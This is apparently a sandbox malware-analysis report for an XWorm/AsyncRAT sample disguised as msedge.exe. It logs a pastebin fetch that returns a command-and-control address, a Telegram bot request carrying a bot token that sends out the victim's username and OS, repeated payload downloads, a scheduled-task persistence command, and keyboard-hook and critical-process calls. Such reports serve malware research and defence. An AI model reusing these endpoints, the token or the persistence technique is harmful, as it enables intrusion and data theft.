Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:45:01 UTC	74	OUT	GET /raw/ZnhxAV6a HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-12-02 17:45:02 UTC	391	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 17:45:02 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: EXPIRED Last-Modified: Mon, 02 Dec 2024 17:45:02 GMT Server: cloudflare CF-RAY: 8ebd20dc6a76431a-EWR
2024-12-02 17:45:02 UTC	36	IN	Data Raw: 31 65 0d 0a 75 70 6f 6e 2d 66 6f 72 6d 69 6e 67 2e 67 6c 2e 61 74 2e 70 6c 79 2e 67 67 3a 33 38 36 35 0d 0a Data Ascii: 1eupon-forming.gl.at.ply.gg:3865
2024-12-02 17:45:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	149.154.167.220	443	6924	C:\Users\user\Desktop\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:45:04 UTC	319	OUT	GET /bot7538644364:AAHEMV7mmxz6PSRgzo0ORf3_n0BaazmrAqk/sendMessage?chat_id=7541917888&text=%E2%98%A0%20%5BWizWorm%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A4C67EC226C1C2FB3C434%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-12-02 17:45:05 UTC	346	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Mon, 02 Dec 2024 17:45:05 GMT Content-Type: application/json Content-Length: 56 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-02 17:45:05 UTC	56	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 30 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4c 6f 67 67 65 64 20 6f 75 74 22 7d Data Ascii: {"ok":false,"error_code":400,"description":"Logged out"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49733	91.134.9.160	443	6924	C:\Users\user\Desktop\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:45:13 UTC	75	OUT	GET /Dwrj41N/Image.png HTTP/1.1 Host: i.ibb.co Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49736	91.134.9.160	443	6924	C:\Users\user\Desktop\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:45:15 UTC	75	OUT	GET /Dwrj41N/Image.png HTTP/1.1 Host: i.ibb.co Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49740	91.134.9.160	443	6924	C:\Users\user\Desktop\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:45:19 UTC	75	OUT	GET /Dwrj41N/Image.png HTTP/1.1 Host: i.ibb.co Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49742	91.134.9.160	443	6924	C:\Users\user\Desktop\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:45:22 UTC	75	OUT	GET /Dwrj41N/Image.png HTTP/1.1 Host: i.ibb.co Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49743	91.134.9.160	443	6924	C:\Users\user\Desktop\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:45:26 UTC	75	OUT	GET /Dwrj41N/Image.png HTTP/1.1 Host: i.ibb.co Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49744	91.134.9.160	443	6924	C:\Users\user\Desktop\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:45:29 UTC	75	OUT	GET /Dwrj41N/Image.png HTTP/1.1 Host: i.ibb.co Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49745	91.134.9.160	443	6924	C:\Users\user\Desktop\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:45:33 UTC	75	OUT	GET /Dwrj41N/Image.png HTTP/1.1 Host: i.ibb.co Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49747	91.134.9.160	443	6924	C:\Users\user\Desktop\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:45:35 UTC	75	OUT	GET /Dwrj41N/Image.png HTTP/1.1 Host: i.ibb.co Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49748	91.134.9.160	443	6924	C:\Users\user\Desktop\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:45:40 UTC	75	OUT	GET /Dwrj41N/Image.png HTTP/1.1 Host: i.ibb.co Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49749	91.134.9.160	443	6924	C:\Users\user\Desktop\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:45:43 UTC	75	OUT	GET /Dwrj41N/Image.png HTTP/1.1 Host: i.ibb.co Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49750	91.134.9.160	443	6924	C:\Users\user\Desktop\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:45:47 UTC	75	OUT	GET /Dwrj41N/Image.png HTTP/1.1 Host: i.ibb.co Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49751	91.134.9.160	443	6924	C:\Users\user\Desktop\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:45:53 UTC	75	OUT	GET /Dwrj41N/Image.png HTTP/1.1 Host: i.ibb.co Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49755	91.134.9.160	443	6924	C:\Users\user\Desktop\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:45:58 UTC	75	OUT	GET /Dwrj41N/Image.png HTTP/1.1 Host: i.ibb.co Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49761	91.134.9.160	443	6924	C:\Users\user\Desktop\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:46:00 UTC	75	OUT	GET /Dwrj41N/Image.png HTTP/1.1 Host: i.ibb.co Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49772	91.134.9.160	443	6924	C:\Users\user\Desktop\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:46:04 UTC	75	OUT	GET /Dwrj41N/Image.png HTTP/1.1 Host: i.ibb.co Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49778	91.134.9.160	443	6924	C:\Users\user\Desktop\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:46:06 UTC	75	OUT	GET /Dwrj41N/Image.png HTTP/1.1 Host: i.ibb.co Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49789	91.134.9.160	443	6924	C:\Users\user\Desktop\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:46:11 UTC	75	OUT	GET /Dwrj41N/Image.png HTTP/1.1 Host: i.ibb.co Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49795	91.134.9.160	443	6924	C:\Users\user\Desktop\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:46:13 UTC	75	OUT	GET /Dwrj41N/Image.png HTTP/1.1 Host: i.ibb.co Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49806	91.134.9.160	443	6924	C:\Users\user\Desktop\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:46:17 UTC	75	OUT	GET /Dwrj41N/Image.png HTTP/1.1 Host: i.ibb.co Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49811	91.134.9.160	443	6924	C:\Users\user\Desktop\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:46:19 UTC	75	OUT	GET /Dwrj41N/Image.png HTTP/1.1 Host: i.ibb.co Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49823	91.134.9.160	443	6924	C:\Users\user\Desktop\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:46:23 UTC	75	OUT	GET /Dwrj41N/Image.png HTTP/1.1 Host: i.ibb.co Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49829	91.134.9.160	443	6924	C:\Users\user\Desktop\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:46:25 UTC	75	OUT	GET /Dwrj41N/Image.png HTTP/1.1 Host: i.ibb.co Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49841	91.134.9.160	443	6924	C:\Users\user\Desktop\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:46:32 UTC	75	OUT	GET /Dwrj41N/Image.png HTTP/1.1 Host: i.ibb.co Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49847	91.134.9.160	443	6924	C:\Users\user\Desktop\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:46:34 UTC	75	OUT	GET /Dwrj41N/Image.png HTTP/1.1 Host: i.ibb.co Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49856	91.134.9.160	443	6924	C:\Users\user\Desktop\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:46:41 UTC	75	OUT	GET /Dwrj41N/Image.png HTTP/1.1 Host: i.ibb.co Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49866	91.134.9.160	443	6924	C:\Users\user\Desktop\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:46:44 UTC	75	OUT	GET /Dwrj41N/Image.png HTTP/1.1 Host: i.ibb.co Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49875	91.134.9.160	443	6924	C:\Users\user\Desktop\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:46:49 UTC	75	OUT	GET /Dwrj41N/Image.png HTTP/1.1 Host: i.ibb.co Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49886	91.134.9.160	443	6924	C:\Users\user\Desktop\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:46:51 UTC	75	OUT	GET /Dwrj41N/Image.png HTTP/1.1 Host: i.ibb.co Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49892	91.134.9.160	443	6924	C:\Users\user\Desktop\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:46:55 UTC	75	OUT	GET /Dwrj41N/Image.png HTTP/1.1 Host: i.ibb.co Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49898	91.134.9.160	443	6924	C:\Users\user\Desktop\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:46:58 UTC	75	OUT	GET /Dwrj41N/Image.png HTTP/1.1 Host: i.ibb.co Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49909	91.134.9.160	443	6924	C:\Users\user\Desktop\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:47:02 UTC	75	OUT	GET /Dwrj41N/Image.png HTTP/1.1 Host: i.ibb.co Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49915	91.134.9.160	443	6924	C:\Users\user\Desktop\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:47:04 UTC	75	OUT	GET /Dwrj41N/Image.png HTTP/1.1 Host: i.ibb.co Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49926	91.134.9.160	443	6924	C:\Users\user\Desktop\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:47:08 UTC	75	OUT	GET /Dwrj41N/Image.png HTTP/1.1 Host: i.ibb.co Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49932	91.134.9.160	443	6924	C:\Users\user\Desktop\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:47:11 UTC	75	OUT	GET /Dwrj41N/Image.png HTTP/1.1 Host: i.ibb.co Connection: Keep-Alive

Target ID:	0
Start time:	12:44:53
Start date:	02/12/2024
Path:	C:\Users\user\Desktop\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\msedge.exe"
Imagebase:	0x600000
File size:	150'016 bytes
MD5 hash:	F1C2525DA4F545E783535C2875962C13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3559719290.00000000129D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.3559719290.00000000129D1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1649838648.0000000000602000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1649838648.0000000000602000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	12:44:54
Start date:	02/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\user\AppData\Local\msedge.exe"
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	12:44:54
Start date:	02/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	12:45:01
Start date:	02/12/2024
Path:	C:\Users\user\AppData\Local\msedge.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\msedge.exe
Imagebase:	0x1e0000
File size:	150'016 bytes
MD5 hash:	F1C2525DA4F545E783535C2875962C13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\msedge.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\msedge.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\msedge.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 79%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	12:45:06
Start date:	02/12/2024
Path:	C:\Users\user\AppData\Local\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\msedge.exe"
Imagebase:	0x530000
File size:	150'016 bytes
MD5 hash:	F1C2525DA4F545E783535C2875962C13
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	12:45:15
Start date:	02/12/2024
Path:	C:\Users\user\AppData\Local\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\msedge.exe"
Imagebase:	0xb60000
File size:	150'016 bytes
MD5 hash:	F1C2525DA4F545E783535C2875962C13
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	12:46:00
Start date:	02/12/2024
Path:	C:\Users\user\AppData\Local\msedge.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\msedge.exe
Imagebase:	0x800000
File size:	150'016 bytes
MD5 hash:	F1C2525DA4F545E783535C2875962C13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	12:47:00
Start date:	02/12/2024
Path:	C:\Users\user\AppData\Local\msedge.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\msedge.exe
Imagebase:	0xec0000
File size:	150'016 bytes
MD5 hash:	F1C2525DA4F545E783535C2875962C13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	12:48:01
Start date:	02/12/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 6924 -s 1484
Imagebase:	0x7ff65d7f0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	19.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	7
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD9B881567 Relevance: 2.0, Strings: 1, Instructions: 784
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

SAO_^, xrefs: 00007FFD9B8817DF, 00007FFD9B881897

Memory Dump Source

Source File: 00000000.00000002.3564843878.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_msedge.jbxd

Similarity

API ID:
String ID: SAO_^
API String ID: 0-3650529936
Opcode ID: 6c227abf258dfabb2bced19e3cf77d2048253fc5fdb71e6ae399b14a8d1bdfef
Instruction ID: c6fda983429e4cb013968022bcf4d37f6d0bb393d2438f5ce07bb8c50dc16647
Opcode Fuzzy Hash: 6c227abf258dfabb2bced19e3cf77d2048253fc5fdb71e6ae399b14a8d1bdfef
Instruction Fuzzy Hash: B932C461B1DE494BE798FB6C98657B9B2D2EF9C300F4405B9E06DC32D6DE28A8418781

Function 00007FFD9B888BF6 Relevance: .6, Instructions: 561
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.3564843878.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_msedge.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f850037579609d7f5c89c923ae1db281d0c39b50cbd0cb4c21d99827161cc23
Instruction ID: 9da9031ba65fc26da1d78ff9dc920598c02038b016cf96af265572f32bcf327a
Opcode Fuzzy Hash: 9f850037579609d7f5c89c923ae1db281d0c39b50cbd0cb4c21d99827161cc23
Instruction Fuzzy Hash: F4128230A09A4E8FEBB8DF68C855BE937D1FF59310F00427AD85DC72A5DB38A9458B41

Function 00007FFD9B8899A2 Relevance: .5, Instructions: 543
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.3564843878.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_msedge.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8df23b97ef6b4cc10e8bc78cf08c4bdff6fbffcdc0dd4b8504c29267a0507808
Instruction ID: 9a36797a51469f22f700223fa4eedaf43ff4a24d7b27deaea2fc73f49e90400b
Opcode Fuzzy Hash: 8df23b97ef6b4cc10e8bc78cf08c4bdff6fbffcdc0dd4b8504c29267a0507808
Instruction Fuzzy Hash: FD02B430A09A4D8FEBB8DF68C8697E937D1FF58310F00467AD81DC72A5CE74A9458B81

Function 00007FFD9B881FB9 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3564843878.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_msedge.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52d4366dc7facd2d095c004b1895088d309bd68e0a2fdb59eab1070e81b3ef8e
Instruction ID: 446565412b02f1dbe1a26a4c5756dbbf623e56911b87d7f4d811f29505634b34
Opcode Fuzzy Hash: 52d4366dc7facd2d095c004b1895088d309bd68e0a2fdb59eab1070e81b3ef8e
Instruction Fuzzy Hash: CC51FD10B1EAC94FD756ABB848346656FE4EF8B229B1904FFE0E9C61E7DD181846C342

Function 00007FFD9B88400D Relevance: 1.7, APIs: 1, Instructions: 154
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlSetProcessIsCritical.NTDLL ref: 00007FFD9B8840E2

Memory Dump Source

Source File: 00000000.00000002.3564843878.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_msedge.jbxd

Similarity

API ID: CriticalProcess
String ID:
API String ID: 2695349919-0
Opcode ID: 91fe40b0df2c8d677b7ff0e6a0c2aa9523b5df804209ab57d1645342700b7452
Instruction ID: 63ed3cdeb729088478048489c821046eae11e2a4f849b164c3ffd42c62393d08
Opcode Fuzzy Hash: 91fe40b0df2c8d677b7ff0e6a0c2aa9523b5df804209ab57d1645342700b7452
Instruction Fuzzy Hash: BD41273190D7488FDB28DFA8D855AE9BBF0FF55311F04416EE09AC3592CB346446CB91

Function 00007FFD9B884A88 Relevance: 1.6, APIs: 1, Instructions: 137
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32 ref: 00007FFD9B884B51

Memory Dump Source

Source File: 00000000.00000002.3564843878.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_msedge.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: c8d17dd9dad5edae35cef25a8f403ebb0e42e96026d11c79d249159708cbc6d2
Instruction ID: c40758ed1b2b8418e926881d6f2ef10bf82367e9dbbf94fd8e87db27551802ce
Opcode Fuzzy Hash: c8d17dd9dad5edae35cef25a8f403ebb0e42e96026d11c79d249159708cbc6d2
Instruction Fuzzy Hash: D0411631A1CA4D4FDB5CDFA898166F9BBE1EF59321F04027ED059C3292CA74A8028781

Analysis Process: msedge.exePID: 2816, Parent PID: 1044COMMON

Executed Functions

Function 00007FFD9B881FB9 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1737516943.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b880000_msedge.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 428688d2bcc1808c3bd5819fc276304172690f828d4026777a2ad76fa6e053f7
Instruction ID: 59582ca04e3060c7cdcb0d376de04da4f1608c0f7ce5237fd67da2e19638728a
Opcode Fuzzy Hash: 428688d2bcc1808c3bd5819fc276304172690f828d4026777a2ad76fa6e053f7
Instruction Fuzzy Hash: 9E51FD10B1EAC94FD756ABB848346656FE4EF8B229B1904FBE0E9C61E7DD181846C342

Function 00007FFD9B880C6E Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1737516943.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b880000_msedge.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce8f15be765fd6cf9b338b5f37a2eed673ae62d9504128b12f88404f48ebd44a
Instruction ID: 39d15daf9a47fa1fd02c3956cefe801ba4e30af7f3dba76adfdb5d37161e2010
Opcode Fuzzy Hash: ce8f15be765fd6cf9b338b5f37a2eed673ae62d9504128b12f88404f48ebd44a
Instruction Fuzzy Hash: 2E711622B1EACA0FE366A77858356B57FE1DF8622470940FBD09CC71E7DD186C468392

Function 00007FFD9B8812F9 Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1737516943.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b880000_msedge.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4a72bb0efca7f2c1fe112b2a6e92c533a76fe599236d5223c723a99b2280551
Instruction ID: f4fde9c47dcfb0ef309e87082755fd731547f89afe3d5dfe0417bb258008c250
Opcode Fuzzy Hash: c4a72bb0efca7f2c1fe112b2a6e92c533a76fe599236d5223c723a99b2280551
Instruction Fuzzy Hash: 99715261F299194FD7A8B7789479AFD76A2FF8C340B800478E41DC32D7DE38A9018791

Function 00007FFD9B88115D Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1737516943.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b880000_msedge.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3331faa0ea91fc97f799a8d5912a79a2ff81e7114e5e72ce9a291633d3255088
Instruction ID: 5c092b068dea0fb88e4eb21b308b5984f355d25bf8af9f32b6d41ce5f252e3d7
Opcode Fuzzy Hash: 3331faa0ea91fc97f799a8d5912a79a2ff81e7114e5e72ce9a291633d3255088
Instruction Fuzzy Hash: 5B412626F09A5B4BEB55F7ACE8B51ED7BB0EF8D214B0401B7C069D71A3EE3428468340

Function 00007FFD9B880588 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1737516943.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b880000_msedge.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3aa45a491075527a42cd0d9f791d4fa8ea6599e8ce196c7f19df1ab5b4669aa
Instruction ID: 3959183f93ddca161236e9e38dad187d432be0a375ac3b7ea494febee48079d2
Opcode Fuzzy Hash: e3aa45a491075527a42cd0d9f791d4fa8ea6599e8ce196c7f19df1ab5b4669aa
Instruction Fuzzy Hash: 5331F521B189480FE79CEB6C9869B78A6C2EFDC715F1505BEE01EC32E7DD64AC428341

Function 00007FFD9B880B09 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1737516943.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd9b880000_msedge.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32d7cd01523cdec03536618040d0709c04f8e7dd401efc20c5582747d569b849
Instruction ID: 966ee263f498d874d30635fc5c0ebe7edc24387e56a9340171ea08fd7209b1be
Opcode Fuzzy Hash: 32d7cd01523cdec03536618040d0709c04f8e7dd401efc20c5582747d569b849
